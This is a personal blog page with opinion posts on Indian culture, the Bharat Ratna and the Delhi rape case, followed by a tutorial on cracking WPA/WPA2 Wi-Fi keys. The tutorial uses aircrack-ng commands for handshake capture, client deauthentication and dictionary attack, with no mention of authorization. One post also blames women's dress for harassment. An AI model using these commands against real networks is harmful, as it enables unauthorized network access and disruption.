phone: +420 776 223 443
e-mail: support@londoncreative.co.uk

Tuesday, November 26, 2013

Bharat, Hindustan and Westernization….Are we really ready to accept western culture

Confusion, confusion and confusion, that’s all we have right now. We Indians are confused to be modernized, westernized or remain with our original Indian culture. We have stepped our one foot in western boat bout don’t want to step out our other leg from Indian culture. This confusion is dramatically influencing our society. The criminal cases, crime against women, all are result of this confusion. Both culture whether it is Indian or westernization or any other culture of world are great. We cannot say that this culture is bad or this culture is good. All cultures have their qualities, all cultures are developed by us , Human. But thing is that are we ready to move from one culture to another. Change is inevitable, we will surely move from our culture to western as we all are very impressed with western culture and trying to be like them. In first attempt we usually think about things favorable to individual. Let’s start with a boy point of view. A boy want to be westernized, he want a girl friend who can roam around him, with whom he can enjoy sexual pleasure. He wants that his choice for marriage will be accepted by his parents, his relatives. He wants to roam in nights with his friends or female friends. He can wear anything he likes. We can say that a boy wants to be totally westernized. But things changes dramatically when it comes to his sister or daughter. He never wants that his sister or daughter should have a boyfriend. He never like his sister to go in clubs in short dress, He wants to see other girls in short dresses, but never wants his sister should wear such types of things. Now case of girls they want to wear short dresses, they want to expose . But her minds turned into Indian when a guy tries to checkout the things she is trying to expose. Then why she is wearing these types of dresses?  What she wants from our society. I am not apposing western culture, or girl’s choice of dresses, but I just want that she should decide whether she wants to be westernized or not. Is she is ready to handle such situations. One more thing I used to see on cities, even in metros, Girls like to wear  t-shirt with some crazy quotations and at the same time, they used to cover their face!! I am always confused about her mentality, what she wants? Is she thinks that her face is too private and it should not be seen by others and  her other body parts can be seen by anyone!! Now comes to parents point of view they wants their children should be westernized they can study anything they want, they should be capable to take decisions. But when it comes to children most important decision of live MARRIAGE; they just want it should be organized by them, not by their children. Bride or groom should be of their choice. Is it fair?
To conclude it’s the, when we should decide what we want, whether we should adopt western culture or and leave our Indian culture or turned back to our own Indian culture. Because both culture cannot sustain together. If we have to ends our social issues, we have to decide………
                                                         …………..Vishwa Pratap Singh………..

Saturday, November 23, 2013

BHARAT RATAN: Is of No Significance now....

Bharat Ratna is for giving selfless service to Nation like Dr. Roa, like Dr. B R ambedkar , Like mother Teresa, C.V. Raman, Vinoba Bhave, Abdul kalam ajad.
I don't believe Sachin's contributions are of that order, for him to be awarded Bharat Ratna. He is merely a sports person, agreed a great one. But his aspiration to become a sports person was personal, not from any desire to serve country (I don't know, how being a sports person can be considered as a service to the country). Yes, he definitely did a great service to the game and he should be awarded whatever is highest award for that game. Even if you want to give this award to a sportsperson then why not to
  • The five-time World chess champion Vishwanathan Anand.
  • Dhyan Chand died 34 years ago, his legacy still continues. Dhyan Chand with three Olympic gold medals. 
  • Amitabh Bachan and Dilip kumar.. who did for Indian Cinema..
How does "national service" or "public service" apply to his contributions? I don't believe his service to the game should anyway be misunderstood as the service to the nation. There are many people, who are doing far better service to the nation, selflessly.
Even Why not for Baba Amte, Tukaram Ombale the police man who caught Ajmal Kasav by sacrificing his life. It helped the country to turnaround the world opinion in the fight against terrorism.
From now there is no significance of this award for me.

                                                                                     ***********Vishwa Pratap Singh************

Monday, January 21, 2013

RAPE, PEOPLE, DELHI, INDIA


This article is not just about Delhi rape incident, it’s about our mentality, our view towards things. A girl being brutally raped by some psychopaths, they’re at a point of desperation, where nothing else is on their mind but to get what they want. But my point is that are they only responsible for the act, we are not? We are not responsible for the murder? Our habit of taking things lightly, our habit of ignoring guilty acts are responsible for the condition of this girl, condition of females, condition for Delhi and condition of India. We are those people who are watching naked girl and guy on road, we are those people who don’t have guts to help them, we are those cops who were fighting about jurisdiction and no one stepped forward to help them.
It’s really nice to see our youths coming forward and asking for strict action. But it is equally disappointing that people are taking it just as topic of discussion, their eyes are only interested in face pictures of ill fated girl. Their eyes were searching some new things about the act, some new masala for the discussion. They have reasons of why girl have been raped, but don’t have how we can stop these types of brutal acts. Rape is not only a matter of discussion, it’s not about that single girl, it’s about all of us, it’s about all of India, it’s about freedom, and it’s about human being. It’s the time when people of India have to do something, much more than just discussions debates and blaming our cops, our country, our government because, Cops are from us, We are leaders or out leaders are chosen by us. It’s the time for change in our thinking work for women empowerment. It should be aims to inspire women with the courage to break free from the chains of limiting belief patterns and societal or religious conditioning that have traditionally kept women suppressed and unable to see their true beauty and power. We should respect womanhood. Please Please  Stop ignoring things stop sex abuse Respect Woman, Help woman, raise your voice against criminal, we should left our habit of just tolerating things, thanks you
 When you feel that you have reached the end
and that you cannot go one step further,
when life seems to be drained of all purpose -
what a wonderful opportunity to start all over again,
to turn over a new page.
                                                                                                                                                                                                                                                                                                        ***********Vishwa Pratap Singh************

Monday, December 31, 2012

Rich UK couples 'increasingly' seeking 'wombs for hire' in India

London, Dec 29 ( ANI ): Wealthy couples in Britain, who cannot have their own children, are increasingly seeking 'wombs for hire' from women overseas, specially from countries such as India, a report has claimed.
The number of couples formally registering children born to foreign surrogates has nearly trebled in five years.
This has raising concerns that poor women in developing countries are being exploited by rich Westerners, the Independent reports.
"Parental orders" granted following surrogacy, to transfer the child from the surrogate mother to the commissioning parents, have risen from 47 in 2007 to 133 in 2011.
According to the paper, the true scale of the trade is driven by agencies operating in developing countries like India.
Commercial surrogacy is permitted in the US and in many other countries including India, where it was legalized in 2002.
But it is banned in Britain and only expenses may be paid, making it difficult for UK couples where neither partner is able to bear children to find women prepared to volunteer for the role, the paper said.
Marilyn Crawshaw, who published the figures on parental orders in the Journal of Social Welfare and Family Law, said that the number of children born in India to commissioning parents from the UK was 'well in excess' of the cases known to official sources, making monitoring very difficult. (ANI)
                                                                                  ***********Vishwa Pratap Singh************ 

Wednesday, August 29, 2012

Tutorial: How to Crack WPA/WPA2


Tutorial: How to Crack WPA/WPA2 

By Vishwa Pratap Singh

August 2012

Introduction

This tutorial walks you through cracking WPA/WPA2 networks which use pre-shared keys. I recommend you do some background reading to better understand what WPA/WPA2 is.
Assumptions
First, this solution assumes:
  • You are using drivers patched for injection. Use the injection test to confirm your card can inject.
  • You are physically close enough to send and receive access point and wireless client packets. Remember that just because you can receive packets from them does not mean you may will be able to transmit packets to them. The wireless card strength is typically less then the AP strength. So you have to be physically close enough for your transmitted packets to reach and be received by both the AP and the wireless client. You can confirm that you can communicate with the specific AP by following these instructions.
  • You are using v0.9.1 or above of aircrack-ng. If you use a different version then some of the command options may have to be changed.
Ensure all of the above assumptions are true, otherwise the advice that follows will not work. In the examples below, you will need to change “ath0” to the interface name which is specific to your wireless card.

Equipment used

In this tutorial, here is what was used:
  • MAC address of PC running aircrack-ng suite: 00:0F:B5:88:AC:82
  • MAC address of the wireless client using WPA2: 00:0F:B5:FD:FB:C2
  • BSSID (MAC address of access point): 00:14:6C:7E:40:80
  • ESSID (Wireless network name): teddy
  • Access point channel: 9
  • Wireless interface: ath0
You should gather the equivalent information for the network you will be working on. Then just change the values in the examples below to the specific network.

Solution

Solution Overview

The objective is to capture the WPA/WPA2 authentication handshake and then use aircrack-ng to crack the pre-shared key.
This can be done either actively or passively. “Actively” means you will accelerate the process by deauthenticating an existing wireless client. “Passively” means you simply wait for a wireless client to authenticate to the WPA/WPA2 network. The advantage of passive is that you don't actually need injection capability and thus the Windows version of aircrack-ng can be used.
Here are the basic steps we will be going through:
  1. Start the wireless interface in monitor mode on the specific AP channel
  2. Start airodump-ng on AP channel with filter for bssid to collect authentication handshake
  3. Use aireplay-ng to deauthenticate the wireless client
  4. Run aircrack-ng to crack the pre-shared key using the authentication handshake

Step 1 - Start the wireless interface in monitor mode

The purpose of this step is to put your card into what is called monitor mode. Monitor mode is the mode whereby your card can listen to every packet in the air. Normally your card will only “hear” packets addressed to you. By hearing every packet, we can later capture the WPA/WPA2 4-way handshake. As well, it will allow us to optionally deauthenticate a wireless client in a later step.
The exact procedure for enabling monitor mode varies depending on the driver you are using. To determine the driver (and the correct procedure to follow), run the following command:
 airmon-ng
On a machine with a Ralink, an Atheros and a Broadcom wireless card installed, the system responds:
 Interface       Chipset         Driver
 
 rausb0          Ralink RT73     rt73
 wlan0           Broadcom        b43 - [phy0]
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0)
The presence of a [phy0] tag at the end of the driver name is an indicator for mac80211, so the Broadcom card is using a mac80211 driver. Note that mac80211 is supported only since aircrack-ng v1.0-rc1, and it won't work with v0.9.1. Both entries of the Atheros card show “madwifi-ng” as the driver - follow the madwifi-ng-specific steps to set up the Atheros card. Finally, the Ralink shows neither of these indicators, so it is using an ieee80211 driver - see the generic instructions for setting it up.

Step 1a - Setting up madwifi-ng

First stop ath0 by entering:
 airmon-ng stop ath0   
The system responds:
 Interface       Chipset         Driver
 
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)
Enter “iwconfig” to ensure there are no other athX interfaces. It should look similar to this:
 lo        no wireless extensions.
 
 eth0      no wireless extensions.
 
 wifi0     no wireless extensions.
If there are any remaining athX interfaces, then stop each one. When you are finished, run “iwconfig” to ensure there are none left.
Now, enter the following command to start the wireless card on channel 9 in monitor mode:
 airmon-ng start wifi0 9
Note: In this command we use “wifi0” instead of our wireless interface of “ath0”. This is because the madwifi-ng drivers are being used.
The system will respond:
 Interface       Chipset         Driver
 
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
You will notice that “ath0” is reported above as being put into monitor mode.
To confirm the interface is properly setup, enter “iwconfig”.
The system will respond:
 lo        no wireless extensions.
 
 wifi0     no wireless extensions.
 
 eth0      no wireless extensions.
 
 ath0      IEEE 802.11g  ESSID:""  Nickname:""
        Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   
        Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  
        Retry:off   RTS thr:off   Fragment thr:off
        Encryption key:off
        Power Management:off
        Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm
        Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
        Tx excessive retries:0  Invalid misc:0   Missed beacon:0
In the response above, you can see that ath0 is in monitor mode, on the 2.452GHz frequency which is channel 9 and the Access Point shows the MAC address of your wireless card. Only the madwifi-ng drivers show the card MAC address in the AP field, other drivers do not. So everything is good. It is important to confirm all this information prior to proceeding, otherwise the following steps will not work properly.
To match the frequency to the channel, check out: http://www.cisco.com/en/US/docs/wireless/technology/channel/deployment/guide/Channel.html#wp134132 . This will give you the frequency for each channel.

Step 1b - Setting up mac80211 drivers

Unlike madwifi-ng, you do not need to remove the wlan0 interface when setting up mac80211 drivers. Instead, use the following command to set up your card in monitor mode on channel 9:
 airmon-ng start wlan0 9
The system responds:
 Interface       Chipset         Driver
 
 wlan0           Broadcom        b43 - [phy0]
                                 (monitor mode enabled on mon0)
Notice that airmon-ng enabled monitor-mode on mon0. So, the correct interface name to use in later parts of the tutorial is mon0. Wlan0 is still in regular (managed) mode, and can be used as usual, provided that the AP that wlan0 is connected to is on the same channel as the AP you are attacking, and you are not performing any channel-hopping.
To confirm successful setup, run “iwconfig”. The following output should appear:
 lo        no wireless extensions.
 eth0      no wireless extensions.
 
 wmaster0  no wireless extensions.
 
 wlan0     IEEE 802.11bg  ESSID:""
           Mode:Managed  Frequency:2.452 GHz  Access Point: Not-Associated
           Tx-Power=0 dBm
           Retry min limit:7   RTS thr:off   Fragment thr=2352 B
           Encryption key:off
           Power Management:off
           Link Quality:0  Signal level:0  Noise level:0
           Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
           Tx excessive retries:0  Invalid misc:0   Missed beacon:0
 
 mon0      IEEE 802.11bg  Mode:Monitor  Frequency:2.452 GHz  Tx-Power=0 dBm
           Retry min limit:7   RTS thr:off   Fragment thr=2352 B
           Encryption key:off
           Power Management:off
           Link Quality:0  Signal level:0  Noise level:0
           Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
           Tx excessive retries:0  Invalid misc:0   Missed beacon:0
Here, mon0 is seen as being in monitor mode, on channel 9 (2.452GHz). Unlike madwifi-ng, the monitor interface has no Access Point field at all. Also notice that wlan0 is still present, and in managed mode - this is normal. Because both interfaces share a common radio, they must always be tuned to the same channel - changing the channel on one interface also changes channel on the other one.

Step 1c - Setting up other drivers

For other (ieee80211-based) drivers, simply run the following command to enable monitor mode (replace rausb0 with your interface name):
 airmon-ng start rausb0 9
The system responds:
 Interface       Chipset         Driver
 
 rausb0          Ralink          rt73 (monitor mode enabled)
At this point, the interface should be ready to use.

Step 2 - Start airodump-ng to collect authentication handshake

The purpose of this step is to run airodump-ng to capture the 4-way authentication handshake for the AP we are interested in.
Enter:
 airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0
Where:
  • -c 9 is the channel for the wireless network
  • --bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminates extraneous traffic.
  • -w psk is the file name prefix for the file which will contain the IVs.
  • ath0 is the interface name.
Important: Do NOT use the ”--ivs” option. You must capture the full packets.
Here what it looks like if a wireless client is connected to the network:
  CH  9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
                                                                                                               
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                               
  00:14:6C:7E:40:80   39 100       51      116   14   9  54  WPA2 CCMP   PSK  teddy                           
                                                                                                               
  BSSID              STATION            PWR  Lost  Packets  Probes                                             
                                                                                                               
  00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2   35     0      116  
In the screen above, notice the “WPA handshake: 00:14:6C:7E:40:80” in the top right-hand corner. This means airodump-ng has successfully captured the four-way handshake.
Here it is with no connected wireless clients:
  CH  9 ][ Elapsed: 4 s ][ 2007-03-24 17:51 
                                                                                                               
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                               
  00:14:6C:7E:40:80   39 100       51        0    0   9  54  WPA2 CCMP   PSK  teddy                           
                                                                                                               
  BSSID              STATION            PWR  Lost  Packets  Probes                                             

Troubleshooting Tip

See the Troubleshooting Tips section below for ideas.
To see if you captured any handshake packets, there are two ways. Watch the airodump-ng screen for ” WPA handshake: 00:14:6C:7E:40:80” in the top right-hand corner. This means a four-way handshake was successfully captured. See just above for an example screenshot.
Use Wireshark and apply a filter of “eapol”. This displays only eapol packets you are interested in. Thus you can see if capture contains 0,1,2,3 or 4 eapol packets.

Step 3 - Use aireplay-ng to deauthenticate the wireless client

This step is optional. If you are patient, you can wait until airodump-ng captures a handshake when one or more clients connect to the AP. You only perform this step if you opted to actively speed up the process. The other constraint is that there must be a wireless client currently associated with the AP. If there is no wireless client currently associated with the AP, then you have to be patient and wait for one to connect to the AP so that a handshake can be captured. Needless to say, if a wireless client shows up later and airodump-ng did not capture the handshake, you can backtrack and perform this step.
This step sends a message to the wireless client saying that that it is no longer associated with the AP. The wireless client will then hopefully reauthenticate with the AP. The reauthentication is what generates the 4-way authentication handshake we are interested in collecting. This is what we use to break the WPA/WPA2 pre-shared key.
Based on the output of airodump-ng in the previous step, you determine a client which is currently connected. You need the MAC address for the following. Open another console session and enter:
 aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0
Where:
  • -0 means deauthentication
  • 1 is the number of deauths to send (you can send multiple if you wish)
  • -a 00:14:6C:7E:40:80 is the MAC address of the access point
  • -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
  • ath0 is the interface name
Here is what the output looks like:
 11:09:28  Sending DeAuth to station   -- STMAC: [00:0F:B5:34:30:30]
With luck this causes the client to reauthenticate and yield the 4-way handshake.

Troubleshooting Tips

  • The deauthentication packets are sent directly from your PC to the clients. So you must be physically close enough to the clients for your wireless card transmissions to reach them. To confirm the client received the deauthentication packets, use tcpdump or similar to look for ACK packets back from the client. If you did not get an ACK packet back, then the client did not “hear” the deauthentication packet.

Step 4 - Run aircrack-ng to crack the pre-shared key

The purpose of this step is to actually crack the WPA/WPA2 pre-shared key. To do this, you need a dictionary of words as input. Basically, aircrack-ng takes each word and tests to see if this is in fact the pre-shared key.
There is a small dictionary that comes with aircrack-ng - “password.lst”. This file can be found in the “test” directory of the aircrack-ng source code. The Wiki FAQ has an extensive list of dictionary sources. You can useJohn the Ripper (JTR) to generate your own list and pipe them into aircrack-ng. Using JTR in conjunction with aircrack-ng is beyond the scope of this tutorial.
Open another console session and enter:
aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap
Where:
  • -w password.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory.
  • *.cap is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.
Here is typical output when there are no handshakes found:
 Opening psk-01.cap
 Opening psk-02.cap
 Opening psk-03.cap
 Opening psk-04.cap
 Read 1827 packets.

 No valid WPA handshakes found.
When this happens you either have to redo step 3 (deauthenticating the wireless client) or wait longer if you are using the passive approach. When using the passive approach, you have to wait until a wireless client authenticates to the AP.
Here is typical output when handshakes are found:
 Opening psk-01.cap
 Opening psk-02.cap
 Opening psk-03.cap
 Opening psk-04.cap
 Read 1827 packets.
 
 #  BSSID              ESSID                     Encryption

 1  00:14:6C:7E:40:80  teddy                     WPA (1 handshake)
 
 Choosing first network as target.
Now at this point, aircrack-ng will start attempting to crack the pre-shared key. Depending on the speed of your CPU and the size of the dictionary, this could take a long time, even days.
Here is what successfully cracking the pre-shared key looks like:
                               Aircrack-ng 0.8
 
 
                 [00:00:00] 2 keys tested (37.20 k/s)
 
 
                         KEY FOUND! [ 12345678 ]
 
 
    Master Key     : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E 
                     B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD 
 
    Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98 
                     CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40 
                     FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E 
                     2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71 
 
    EAPOL HMAC     : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB 

***********Vishwa Pratap Singh************